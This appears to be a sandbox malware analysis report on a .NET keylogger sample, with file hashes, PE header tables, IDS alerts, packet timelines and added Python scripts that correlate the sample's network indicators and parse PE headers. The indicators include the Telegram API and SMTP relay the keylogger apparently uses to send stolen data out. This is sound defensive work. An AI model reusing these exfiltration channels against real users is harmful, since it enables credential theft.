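The context tables above tie this sample's network indicators (the reallyfreegeoip.org lookup, api.telegram.org on 149.154.167.220, the us2.smtp.mailhostbox.com relay, and the two JA3 hashes) to other Snake Keylogger, VIP Keylogger, AgentTesla and MassLogger submissions. The Python script below is an added example, not part of the Joe Sandbox report, showing how a detection engineer can apply those indicators to proxy/TLS telemetry without drowning in false positives: 188.114.96.3 and 188.114.97.3 are Cloudflare anycast addresses and api.telegram.org carries plenty of legitimate traffic, so a lone hit on either is a weak signal, whereas a geolocation lookup followed within minutes by a Telegram or SMTP contact from the same process reproduces the sequence this report flags ("Tries to detect the country of the analysis system" followed by "Uses the Telegram API"). The log format, host names, process names and timestamps are constructed for the example.

```python
"""Correlate the network indicators from the report's context tables against
proxy/TLS telemetry.  Added example, not part of the Joe Sandbox report; the
log format and all sample records below are constructed for the demonstration."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators taken from the report's IP / domain / JA3 context tables.
IOC_DOMAINS = {
    "reallyfreegeoip.org": "geoip lookup (victim country check)",
    "api.telegram.org": "Telegram Bot API (exfiltration / C2)",
    "us2.smtp.mailhostbox.com": "SMTP relay seen with AgentTesla / Snake Keylogger",
}
IOC_IPS = {
    "149.154.167.220": "api.telegram.org (TELEGRAMRU)",
    "188.114.96.3": "reallyfreegeoip.org (Cloudflare anycast)",
    "188.114.97.3": "reallyfreegeoip.org (Cloudflare anycast)",
    "208.91.199.223": "us2.smtp.mailhostbox.com",
    "208.91.199.224": "us2.smtp.mailhostbox.com",
    "208.91.199.225": "us2.smtp.mailhostbox.com",
}
IOC_JA3 = {
    "54328bd36c14bd82ddaa0c04b25ed9ad": "JA3 seen with Snake Keylogger / MassLogger",
    "3b5074b1b5d032e5620f69f9f700ff0e": "JA3 seen with Snake Keylogger / Remcos",
}

# Constructed log format: <iso time> <src host> <process> <dst name or -> <dst ip> <ja3 or ->
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<proc>\S+) (?P<dst>\S+) (?P<ip>\S+) (?P<ja3>\S+)$"
)

def parse_line(line):
    """Parse one constructed log line into a dict, or return None if malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec

def hits_for(rec):
    """Return the indicator descriptions a single record matches (may be empty)."""
    hits = []
    if rec["dst"] in IOC_DOMAINS:
        hits.append(IOC_DOMAINS[rec["dst"]])
    if rec["ip"] in IOC_IPS:
        hits.append(IOC_IPS[rec["ip"]])
    if rec["ja3"] in IOC_JA3:
        hits.append(IOC_JA3[rec["ja3"]])
    return hits

def correlate(lines, window=timedelta(minutes=10)):
    """Group matching records per (host, process) and rate each group.

    'high'   : geoip lookup followed within `window` by Telegram or SMTP contact
               from the same process (the sequence this sample performs).
    'medium' : a known JA3 hash together with a geoip or exfil destination.
    'low'    : a lone destination hit; Telegram and Cloudflare serve benign traffic.
    """
    by_proc = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and hits_for(rec):
            by_proc[(rec["src"], rec["proc"])].append(rec)

    findings = {}
    for key, recs in by_proc.items():
        recs.sort(key=lambda r: r["ts"])
        geo = [r["ts"] for r in recs if r["dst"] == "reallyfreegeoip.org"]
        exfil = [r["ts"] for r in recs
                 if r["dst"] in ("api.telegram.org", "us2.smtp.mailhostbox.com")]
        ja3 = any(r["ja3"] in IOC_JA3 for r in recs)
        chained = any(timedelta(0) <= (e - g) <= window for g in geo for e in exfil)
        if chained:
            level = "high"
        elif ja3 and (geo or exfil):
            level = "medium"
        else:
            level = "low"
        indicators = sorted({h for r in recs for h in hits_for(r)})
        findings[key] = {"level": level, "indicators": indicators}
    return findings

# Constructed sample telemetry: one infected host, one benign bot script, one
# unknown binary with a matching JA3, one clean browser session.
SAMPLE_LOG = """\
2024-11-06T10:00:01 WS-17 Lpjrd6Wxad.exe reallyfreegeoip.org 188.114.96.3 54328bd36c14bd82ddaa0c04b25ed9ad
2024-11-06T10:00:04 WS-17 Lpjrd6Wxad.exe api.telegram.org 149.154.167.220 54328bd36c14bd82ddaa0c04b25ed9ad
2024-11-06T10:01:10 WS-22 python.exe api.telegram.org 149.154.167.220 -
2024-11-06T10:01:30 WS-31 update.exe reallyfreegeoip.org 188.114.97.3 3b5074b1b5d032e5620f69f9f700ff0e
2024-11-06T10:02:00 WS-09 chrome.exe www.example.com 203.0.113.5 -
""".splitlines()

if __name__ == "__main__":
    for (host, proc), f in sorted(correlate(SAMPLE_LOG).items()):
        print(f"{host} {proc}: {f['level']} -> {', '.join(f['indicators'])}")
```

Run directly, the script prints one rated line per (host, process); correlate() returns the same findings as a dict so the logic can sit behind a SIEM rule or a scheduled hunt. The indicator values are exactly the ones the report's tables show; extend IOC_IPS with care, because the Cloudflare and Telegram address ranges rotate and the domain and JA3 matches are the more durable part of the signature.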
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):5.636909452144038
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.79%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:Lpjrd6Wxad.exe
File size:274'432 bytes
MD5:2ba023727b7a6399471d26a38f26695a
SHA1:69d719ca185d62a737a2503a45b1b04cd097e190
SHA256:51f52b4829b1930c3d4781e63ac08ccb74840c9b901b46b9f35274803e6d5571
SHA512:8c503e6b5492b5a9f0f102bb30c34ba0c6d33af46d39edf7aa07429a07ae7720b0ec61a4fd1280d5ca4899e848cb436e1d3633b64f0c83a01e75e4be1f848ed9
SSDEEP:3072:8icrbDkA33F1ykglgPXQdwflU4uSL12ZazfbIrTu5Yso2UY/Vg4imbbY:YudZaDbNRFb
TLSH:2A4483193FD49810E2FF8577C2B69125C6BAB8A306158D2E17D1E81A3F3E944DE06F63
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..............9... ...@....@.. ....................................@................................
Icon Hash:00928e8e8686b000
Entrypoint:0x44392e
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entry point preview)
jmp dword ptr [00402000h]
(97 further lines of "add byte ptr [eax], al" follow in the listing; that is how the disassembler renders the zero bytes after the stub, not code)
The jump target 0x00402000 is ImageBase 0x400000 plus the IAT RVA 0x2000, and the IAT (size 0x8: one slot plus the null terminator) holds only the mscoree.dll _CorExeMain thunk listed under Imports. The native entry point at 0x44392e (RVA 0x4392e) is therefore the standard six-byte loader stub of a 32-bit .NET executable; the program's real logic is managed code reached through the CLR header at RVA 0x2008 and is not visible in this listing.
Data directories
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x438dc          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x44000          0x1017        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x46000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0x41934       0x41a00   b2629c81f514dbeae295aa7ebae22513  False     0.21527901785714285  data       5.638874314512594    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x44000          0x1017        0x1200    88098f3cc5116033740d150580315cfd  False     0.3546006944444444   data       4.768725814534678    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x46000          0xc           0x200     12ea8885c1ee53d95e47bca720b95527  False     0.044921875          data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x440a0  0x31c  data                                                                                                 0.4271356783919598
RT_MANIFEST  0x443bc  0xc5b  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.3926651912741069
Imports
DLL          Import
mscoree.dll  _CorExeMain
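The static tables above (data directories, sections, imports and the entry-point stub) can be reproduced and cross-checked with a short header parser. The following Python is an added example and not part of the Joe Sandbox report: it builds a constructed, minimal PE32 image laid out like the sample (ImageBase 0x400000, IAT at RVA 0x2000, CLR header at RVA 0x2008, a single .text section, the report's link timestamp) and then parses it the way an analyst would parse the real file, checking that the entry point is the six-byte "jmp dword ptr [IAT slot]" stub to _CorExeMain and that the COM descriptor directory is populated, which together are what marks a managed executable. The builder, the section layout and the entry RVA 0x2060 are the example's own assumptions; on a real file call parse_pe(open(path, "rb").read()).

```python
import math
import struct
from datetime import datetime, timezone

# Data-directory names in PE-spec order (index 14 is the CLR/COM descriptor)
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte, as in the report's per-section Entropy column."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Parse DOS/COFF/optional headers and sections, then apply the .NET-stub checks."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    if pe32plus:                       # ImageBase is 8 bytes at +24, directories start at +112
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        dirs_off = opt + 112
    else:                              # PE32: ImageBase 4 bytes at +28, directories at +96
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        dirs_off = opt + 96
    dirs = {name: struct.unpack_from("<II", data, dirs_off + 8 * i)
            for i, name in enumerate(DIRECTORY_NAMES)}

    sections = []
    sec_off = opt + opt_size
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, sec_off + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size, "entropy": entropy(raw)})

    def rva_to_offset(rva: int) -> int:
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
                return s["raw_ptr"] + (rva - s["va"])
        raise ValueError(f"RVA {rva:#x} is not inside any section")

    # A managed PE32 image begins with FF 25 <absolute address>: jmp dword ptr [IAT slot].
    # The slot is the mscoree!_CorExeMain thunk, so the target must equal ImageBase + IAT RVA.
    ep = rva_to_offset(entry_rva)
    target = struct.unpack_from("<I", data, ep + 2)[0] if data[ep:ep + 2] == b"\xff\x25" else None
    return {
        "machine": machine,
        "pe32plus": pe32plus,
        "timestamp": datetime.fromtimestamp(stamp, timezone.utc),
        "image_base": image_base,
        "entry_rva": entry_rva,
        "directories": dirs,
        "sections": sections,
        "has_clr_header": dirs["COM_DESCRIPTOR"][0] != 0,
        "entry_jmp_target": target,
        "stub_hits_iat": target is not None and target == image_base + dirs["IAT"][0],
    }


def build_sample_pe() -> bytes:
    """Constructed stand-in (not the analysed file): PE32, one .text section at RVA 0x2000
    holding the IAT slot, the CLR header and the jmp stub, like the report's directory table."""
    image_base, text_rva, text_raw, entry_rva = 0x400000, 0x2000, 0x200, 0x2060
    text = bytearray(0x200)
    off = entry_rva - text_rva
    text[off:off + 6] = b"\xff\x25" + struct.pack("<I", image_base + text_rva)  # jmp [0x402000]
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x669085D9, 0, 0, 0xE0, 0x0102)  # I386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<IIII", opt, 16, entry_rva, text_rva, 0, image_base)  # entry, code, data, base
    struct.pack_into("<II", opt, 32, 0x2000, 0x200)                         # section/file alignment
    struct.pack_into("<II", opt, 56, 0x4000, 0x200)                         # SizeOfImage/Headers
    struct.pack_into("<I", opt, 92, 16)                                     # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * 12, text_rva, 8)                  # IAT directory
    struct.pack_into("<II", opt, 96 + 8 * 14, text_rva + 8, 0x48)           # COM descriptor
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_rva, len(text), text_raw,
                      0, 0, 0, 0, 0x60000020)
    return bytes((dos + b"PE\0\0" + coff + opt + sec).ljust(text_raw, b"\0") + text)


if __name__ == "__main__":
    pe = parse_pe(build_sample_pe())
    print(f"entry {pe['image_base'] + pe['entry_rva']:#x} -> jmp [{pe['entry_jmp_target']:#x}]"
          f" CLR header: {pe['has_clr_header']} stub hits IAT: {pe['stub_hits_iat']}")
    for s in pe["sections"]:
        print(f"{s['name']:<8}{s['va']:#x}  entropy {s['entropy']:.3f}")
```

Every number the report prints in the tables above (directory RVAs, section entropies, the link time of 0x669085D9) falls out of these few unpack calls; the two boolean checks at the end are the cheap, deterministic way to confirm "Mono/.Net assembly" before reaching for a decompiler.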
IDS alerts
Timestamp                        SID      Signature                                                                Severity  Source IP      Source Port  Dest IP        Dest Port  Protocol
2024-11-07T15:19:30.556068+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                        2         192.168.2.8    49706        193.122.130.0  80         TCP
2024-11-07T15:19:32.931122+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                        2         192.168.2.8    49706        193.122.130.0  80         TCP
2024-11-07T15:19:33.661061+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                         3         192.168.2.8    49708        188.114.96.3   443        TCP
2024-11-07T15:19:35.790706+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                        2         192.168.2.8    49709        193.122.130.0  80         TCP
2024-11-07T15:19:43.626300+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                         3         192.168.2.8    49717        188.114.96.3   443        TCP
2024-11-07T15:19:43.784767+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.12.23.50    443          192.168.2.8    49714      TCP
2024-11-07T15:19:46.123464+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H                         3         192.168.2.8    49722        188.114.96.3   443        TCP
2024-11-07T15:20:22.004076+0100  2022930  ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow  1         20.109.210.53  443          192.168.2.8    49729      TCP
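Reading alerts and a per-packet timeline side by side is easier once both are keyed on the same connection. The Python below is an added example, not part of the report: it re-types the eight alert rows above and the first thirteen packets of the timeline that follows as constructed input, rebuilds bidirectional flows keyed on the local endpoint (so client-to-server and server-to-client packets, and an alert fired in either direction, all land on one key), attaches each alert to its flow, lists alerts for which the excerpt holds no packets, and rolls everything up per remote host. It assumes 192.168.0.0/16 is the analysis network and that both tables are in CET; the delimiter and the helper names are the example's own.

```python
from collections import Counter
from datetime import datetime

# Constructed input, re-typed from the report's tables. Alert columns: timestamp, SID,
# signature, severity, source IP, source port, dest IP, dest port. Packet columns:
# timestamp, source port, dest port, source IP, dest IP (the report's own order).
ALERT_LINES = """
2024-11-07T15:19:30.556068+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49706 | 193.122.130.0 | 80
2024-11-07T15:19:32.931122+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49706 | 193.122.130.0 | 80
2024-11-07T15:19:33.661061+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49708 | 188.114.96.3 | 443
2024-11-07T15:19:35.790706+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49709 | 193.122.130.0 | 80
2024-11-07T15:19:43.626300+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49717 | 188.114.96.3 | 443
2024-11-07T15:19:43.784767+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.8 | 49714
2024-11-07T15:19:46.123464+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49722 | 188.114.96.3 | 443
2024-11-07T15:20:22.004076+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.8 | 49729
"""

PACKET_LINES = """
Nov 7, 2024 15:19:27.676573992 CET | 49706 | 80 | 192.168.2.8 | 193.122.130.0
Nov 7, 2024 15:19:27.681473970 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.8
Nov 7, 2024 15:19:27.681561947 CET | 49706 | 80 | 192.168.2.8 | 193.122.130.0
Nov 7, 2024 15:19:27.681952953 CET | 49706 | 80 | 192.168.2.8 | 193.122.130.0
Nov 7, 2024 15:19:27.686779976 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.8
Nov 7, 2024 15:19:28.980173111 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.8
Nov 7, 2024 15:19:28.997977018 CET | 49706 | 80 | 192.168.2.8 | 193.122.130.0
Nov 7, 2024 15:19:29.002871037 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.8
Nov 7, 2024 15:19:30.501673937 CET | 80 | 49706 | 193.122.130.0 | 192.168.2.8
Nov 7, 2024 15:19:30.550683022 CET | 49707 | 443 | 192.168.2.8 | 188.114.96.3
Nov 7, 2024 15:19:30.550726891 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.8
Nov 7, 2024 15:19:30.550786972 CET | 49707 | 443 | 192.168.2.8 | 188.114.96.3
Nov 7, 2024 15:19:30.556067944 CET | 49706 | 80 | 192.168.2.8 | 193.122.130.0
"""

LOCAL_PREFIX = "192.168."  # assumption: the sandbox's analysis network in this report


def parse_packet_time(text: str) -> datetime:
    """'Nov 7, 2024 15:19:27.676573992 CET' -> naive datetime. The zone token is dropped
    (both tables are CET) and nanoseconds are cut to the microseconds strptime accepts."""
    stamp, _zone = text.rsplit(" ", 1)
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def flow_key(src_ip, src_port, dst_ip, dst_port):
    """Normalise a 4-tuple to (local ip, local port, remote ip, remote port) plus the
    packet's direction, so both halves of a connection share one key."""
    if src_ip.startswith(LOCAL_PREFIX):
        return (src_ip, int(src_port), dst_ip, int(dst_port)), "out"
    return (dst_ip, int(dst_port), src_ip, int(src_port)), "in"


def correlate(alert_text: str, packet_text: str):
    """Build flows from packet rows, then attach alerts by flow key.
    Returns (flows, orphans); orphans are alerts whose flow has no packets in the input."""
    flows = {}
    for line in packet_text.strip().splitlines():
        ts, sport, dport, sip, dip = [cell.strip() for cell in line.split("|")]
        key, direction = flow_key(sip, sport, dip, dport)
        t = parse_packet_time(ts)
        flow = flows.setdefault(key, {"first": t, "last": t, "out": 0, "in": 0, "alerts": []})
        flow["first"], flow["last"] = min(flow["first"], t), max(flow["last"], t)
        flow[direction] += 1
    orphans = []
    for line in alert_text.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport = [cell.strip() for cell in line.split("|")]
        key, _ = flow_key(sip, sport, dip, dport)
        alert = {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                 "sid": int(sid), "signature": sig, "severity": int(sev)}
        if key in flows:
            flows[key]["alerts"].append(alert)
        else:
            orphans.append((key, alert))
    return flows, orphans


def by_remote(flows, orphans):
    """Roll flows and alerts up per remote (ip, port): captured flow count and SID histogram."""
    summary = {}
    for key, flow in flows.items():
        entry = summary.setdefault(key[2:], {"flows": 0, "alerts": Counter()})
        entry["flows"] += 1
        entry["alerts"].update(a["sid"] for a in flow["alerts"])
    for key, alert in orphans:
        summary.setdefault(key[2:], {"flows": 0, "alerts": Counter()})["alerts"][alert["sid"]] += 1
    return summary


if __name__ == "__main__":
    flows, orphans = correlate(ALERT_LINES, PACKET_LINES)
    for (lip, lport, rip, rport), f in flows.items():
        span = (f["last"] - f["first"]).total_seconds()
        print(f"{lip}:{lport} -> {rip}:{rport}  {f['out']} out / {f['in']} in  {span:.3f}s  "
              f"alerts={dict(Counter(a['sid'] for a in f['alerts']))}")
    for (lip, lport, rip, rport), a in orphans:
        print(f"no packets for {lip}:{lport} -> {rip}:{rport}: {a['sid']} {a['signature']}")
    for remote, s in by_remote(flows, orphans).items():
        print(remote, "flows:", s["flows"], "alerts:", dict(s["alerts"]))
```

Direction normalisation is the point of the exercise: the two CVE-2016-2211 alerts are logged with the remote host as source, so without it they would look like two extra endpoints instead of the local ports 49714 and 49729; the per-remote roll-up then shows at a glance that 193.122.130.0:80 and 188.114.96.3:443 each carry three alerts across several short-lived connections.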
Packets
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Nov 7, 2024 15:19:27.676573992 CET  49706        80         192.168.2.8    193.122.130.0
Nov 7, 2024 15:19:27.681473970 CET  80           49706      193.122.130.0  192.168.2.8
Nov 7, 2024 15:19:27.681561947 CET  49706        80         192.168.2.8    193.122.130.0
Nov 7, 2024 15:19:27.681952953 CET  49706        80         192.168.2.8    193.122.130.0
Nov 7, 2024 15:19:27.686779976 CET  80           49706      193.122.130.0  192.168.2.8
Nov 7, 2024 15:19:28.980173111 CET  80           49706      193.122.130.0  192.168.2.8
Nov 7, 2024 15:19:28.997977018 CET  49706        80         192.168.2.8    193.122.130.0
Nov 7, 2024 15:19:29.002871037 CET  80           49706      193.122.130.0  192.168.2.8
Nov 7, 2024 15:19:30.501673937 CET  80           49706      193.122.130.0  192.168.2.8
Nov 7, 2024 15:19:30.550683022 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:30.550726891 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:30.550786972 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:30.556067944 CET  49706        80         192.168.2.8    193.122.130.0
Nov 7, 2024 15:19:30.559814930 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:30.559833050 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.207993031 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.208106041 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:31.215787888 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:31.215800047 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.216104984 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.259198904 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:31.267218113 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:31.311340094 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.472800016 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.472897053 CET  443          49707      188.114.96.3   192.168.2.8
Nov 7, 2024 15:19:31.473037958 CET  49707        443        192.168.2.8    188.114.96.3
Nov 7, 2024 15:19:31.479054928 CET  49707        443        192.168.2.8    188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:31.482440948 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:31.487319946 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.888868093 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.900310993 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900352001 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.900408030 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900845051 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:32.900857925 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:32.931122065 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.507742882 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.510415077 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.510456085 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661062956 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661154985 CET44349708188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.661250114 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.661781073 CET49708443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:33.665072918 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.666435957 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.670344114 CET8049706193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.670404911 CET4970680192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.671325922 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:33.671397924 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.671489000 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:33.676790953 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.745354891 CET8049709193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.746782064 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.746824026 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.746907949 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.747193098 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:35.747205973 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:35.790705919 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.386620998 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.388458014 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.388499975 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533402920 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533513069 CET44349710188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:36.533560038 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.534020901 CET49710443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:36.543509960 CET4971180192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:36.548369884 CET8049711193.122.130.0192.168.2.8
